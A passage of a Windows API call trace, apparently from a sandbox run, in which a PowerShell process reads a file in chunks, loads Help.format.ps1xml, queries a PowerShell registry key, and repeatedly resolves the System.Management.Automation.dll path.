	[0651.509] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.509] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.509] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.510] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.510] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.510] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.510] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.511] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.511] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.511] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.512] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.512] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.512] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.512] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.513] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.513] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0xf37, lpOverlapped=0x0) returned 1
	[0651.513] ReadFile (in: hFile=0x324, lpBuffer=0x2ea666f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea666f*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0651.513] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0651.513] CloseHandle (hObject=0x324) returned 1
	[0651.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0651.514] SetErrorMode (uMode=0x1) returned 0x1
	[0651.514] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfe0 | out: lpFileInformation=0x26cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0651.514] SetErrorMode (uMode=0x1) returned 0x1
	[0651.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0651.514] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0c8 | out: phkResult=0x26d0c8*=0x324) returned 0x0
	[0651.514] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d04c, lpData=0x0, lpcbData=0x26d048*=0x0 | out: lpType=0x26d04c*=0x1, lpData=0x0, lpcbData=0x26d048*=0x56) returned 0x0
	[0651.514] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35c80
	[0651.515] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d01c, lpData=0x1ba35c80, lpcbData=0x26d018*=0x56 | out: lpType=0x26d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d018*=0x56) returned 0x0
	[0651.515] CoTaskMemFree (pv=0x1ba35c80) 
	[0651.515] RegCloseKey (hKey=0x324) returned 0x0
	[0651.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0651.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0651.520] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x65350378, Data2=0xb2ec, Data3=0x4e3c, Data4=([0]=0x80, [1]=0x9f, [2]=0x87, [3]=0xb, [4]=0x4c, [5]=0x54, [6]=0x39, [7]=0x5a))) returned 0x0
	[0651.520] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xad2819d4, Data2=0xcd26, Data3=0x446a, Data4=([0]=0xbf, [1]=0x92, [2]=0xfa, [3]=0xff, [4]=0x9d, [5]=0xc9, [6]=0x5d, [7]=0x21))) returned 0x0
	[0651.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0651.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0651.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0651.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.183] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x2e6147e, Data2=0x1653, Data3=0x494a, Data4=([0]=0x8a, [1]=0x5e, [2]=0x73, [3]=0x48, [4]=0x1b, [5]=0xbe, [6]=0x6d, [7]=0x22))) returned 0x0
	[0653.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.188] VirtualQuery (in: lpAddress=0x26b300, lpBuffer=0x26c1c0, dwLength=0x30 | out: lpBuffer=0x26c1c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0653.189] VirtualQuery (in: lpAddress=0x26b390, lpBuffer=0x26c250, dwLength=0x30 | out: lpBuffer=0x26c250*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0653.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.190] VirtualQuery (in: lpAddress=0x26bb10, lpBuffer=0x26c9d0, dwLength=0x30 | out: lpBuffer=0x26c9d0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0653.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.192] VirtualQuery (in: lpAddress=0x26bb10, lpBuffer=0x26c9d0, dwLength=0x30 | out: lpBuffer=0x26c9d0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0653.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0653.193] VirtualQuery (in: lpAddress=0x26bb10, lpBuffer=0x26c9d0, dwLength=0x30 | out: lpBuffer=0x26c9d0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0653.205] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xe782e05a, Data2=0x3ee, Data3=0x4fb7, Data4=([0]=0xb3, [1]=0x5c, [2]=0x70, [3]=0x9, [4]=0x15, [5]=0xde, [6]=0x65, [7]=0xd9))) returned 0x0
	[0653.206] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xa724620c, Data2=0x6815, Data3=0x4a2c, Data4=([0]=0xb2, [1]=0x32, [2]=0x1c, [3]=0x33, [4]=0xe6, [5]=0xfe, [6]=0x17, [7]=0xb0))) returned 0x0
	[0653.206] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xc9c13e38, Data2=0xc18, Data3=0x4209, Data4=([0]=0x9a, [1]=0xb4, [2]=0x40, [3]=0x12, [4]=0xa1, [5]=0xfc, [6]=0xe2, [7]=0x39))) returned 0x0
	[0653.209] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x87a5eaac, Data2=0x3ad1, Data3=0x4efb, Data4=([0]=0x8d, [1]=0xdd, [2]=0x0, [3]=0xd9, [4]=0x75, [5]=0x70, [6]=0xd4, [7]=0x16))) returned 0x0
	[0653.209] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xc118b0e7, Data2=0xb314, Data3=0x4d45, Data4=([0]=0x84, [1]=0x66, [2]=0x7d, [3]=0x86, [4]=0x8a, [5]=0xac, [6]=0x24, [7]=0x6b))) returned 0x0
	[0653.209] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x83fb63dc, Data2=0x83d, Data3=0x48c1, Data4=([0]=0x97, [1]=0x26, [2]=0x6f, [3]=0xbc, [4]=0x91, [5]=0x3d, [6]=0x95, [7]=0x8e))) returned 0x0
